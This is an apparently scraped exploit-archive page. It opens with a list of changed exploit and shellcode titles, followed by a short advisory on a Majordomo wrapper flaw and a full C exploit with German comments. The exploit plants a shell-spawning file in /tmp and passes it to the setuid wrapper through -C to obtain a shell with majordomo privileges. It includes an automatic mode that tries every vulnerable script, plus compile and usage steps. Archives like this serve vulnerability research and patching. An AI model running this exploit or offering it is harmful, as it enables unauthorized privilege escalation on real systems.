880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
123 lines
No EOL
4.3 KiB
C
123 lines
No EOL
4.3 KiB
C
// source: https://www.securityfocus.com/bid/903/info
|
||
|
||
It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges.
|
||
|
||
This occurs on several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ uses 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.
|
||
|
||
/*
|
||
MAJORDOMO - EXPLOIT F<>R LINUX
|
||
getestet bis v1.94.5
|
||
programmiert von Morpheus
|
||
|
||
Der Exploit basiert auf der fehlerhaften Nutzung von Majordomo-
|
||
Skripten. Standardm<64><6D>ig wird vom Exploit das "bounce-remind"-Skript
|
||
verwandt. Bei Erfolg liefert der Exploit eine Shell mit einer uid
|
||
und gid dem Majordomo Wrapper entsprechend gesetzt.
|
||
Getestet wurde der Exploit auf SuSE Linux 6.0 / 6.3 (CeBIT-Version).
|
||
|
||
Zur Kompilierung des Exploits:
|
||
|
||
gcc major.c -o major
|
||
|
||
Zur Nutzung des Exploits:
|
||
|
||
Wenn der Exploit <major> hei<65>t dann einfach ./major eingeben. Es
|
||
sollte gen<65>gen. Wenn dann keine Shell gestartet wird, bitte die
|
||
Fehlermeldungen beachten. Entweder ist die Majordomo-Version nicht
|
||
"kompatibel" oder das Majordomo-Skript ist nicht vorhanden. Dann
|
||
sollte man entweder ./major auto eingeben, so dass der Exploit
|
||
alle verwundbaren Skripts ausprobiert, oder man gibt ./major <skript>
|
||
ein, wobei <skript> durch ein verwundbares Majordomo-Skript zu ersetzen
|
||
ist. Um die Hilfe-<2D>bersicht zu bekommen, einfach ./major -h eingeben.
|
||
|
||
|
||
Programmiert von Morpheus [BrightDarkness] '00
|
||
URL: www.brightdarkness.de
|
||
Mail: morpheusbd@gmx.net
|
||
|
||
|
||
Dieser Bug in Majordomo wurde nicht von mir entdeckt. Ich habe nur
|
||
zu diesem Bug den entsprechenden Exploit programmiert.
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <fcntl.h>
|
||
|
||
#define MAJORDOMO "/usr/lib/majordomo/wrapper"
|
||
#define SHELL "system(\"/bin/sh\")"
|
||
#define MORPHEUS "/tmp/morpheus"
|
||
#define WRAPPER "wrapper"
|
||
|
||
void intro(void);
|
||
void usage(char *arg);
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
char skript[30];
|
||
char *skripte[40];
|
||
int i = 0;
|
||
int file;
|
||
|
||
skripte[1] = "bounce-remind";
|
||
skripte[2] = "archive2.pl";
|
||
skripte[3] = "config-test";
|
||
skripte[4] = "digest";
|
||
skripte[5] = "majordomo";
|
||
skripte[6] = "request-answer";
|
||
skripte[7] = "resend";
|
||
|
||
if ((argc == 2) && (strcmp(argv[1], "-h") == 0))
|
||
usage(argv[0]);
|
||
|
||
if (argc == 2)
|
||
strncpy(skript,argv[1], strlen(skript));
|
||
else
|
||
strcpy(skript, "bounce-remind");
|
||
|
||
if ((file = open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
|
||
{
|
||
perror(MORPHEUS);
|
||
exit(1);
|
||
}
|
||
write(file, SHELL, strlen(SHELL));
|
||
close(file);
|
||
|
||
intro();
|
||
if (strncmp(skript, "auto") == 0)
|
||
{
|
||
for (i = 1; i <= 7; i++)
|
||
{
|
||
printf("using : %s\n", skripte[i]);
|
||
if (execl(MAJORDOMO, WRAPPER, skripte[i], "-C", MORPHEUS, 0) == -1) perror("EXECL");
|
||
}
|
||
}
|
||
else
|
||
{
|
||
printf("using : %s\n", skript);
|
||
if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, 0) == -1) perror("EXECL");
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
void intro(void)
|
||
{
|
||
printf("\033[2J\033[1;1H");
|
||
printf("\033[1;33mExploit-Code f<>r Majordomo Wrapper <= v1.94.5\n");
|
||
printf("\033[1;32mProgrammiert von Morpheus [BrightDarkness] '00\n");
|
||
printf("\033[1;31mURL: \033[1;32mwww.brightdarkness.de\n");
|
||
printf("\033[1;31mmail: \033[1;32mmorpheusbd@gmx.net\n");
|
||
printf("\033[0;29m");
|
||
}
|
||
|
||
void usage(char *arg)
|
||
{
|
||
intro();
|
||
printf("\033[1;34m");
|
||
printf("Hilfe f<>r dieses Programm :\n");
|
||
printf("Benutzung : %s -h Help screen\n", arg);
|
||
printf(" %s auto Trying all scripts automatically\n", arg);
|
||
printf(" %s <skriptname> Tries just this <script>\n", arg);
|
||
printf("\033[0;29m");
|
||
exit(0);
|
||
} |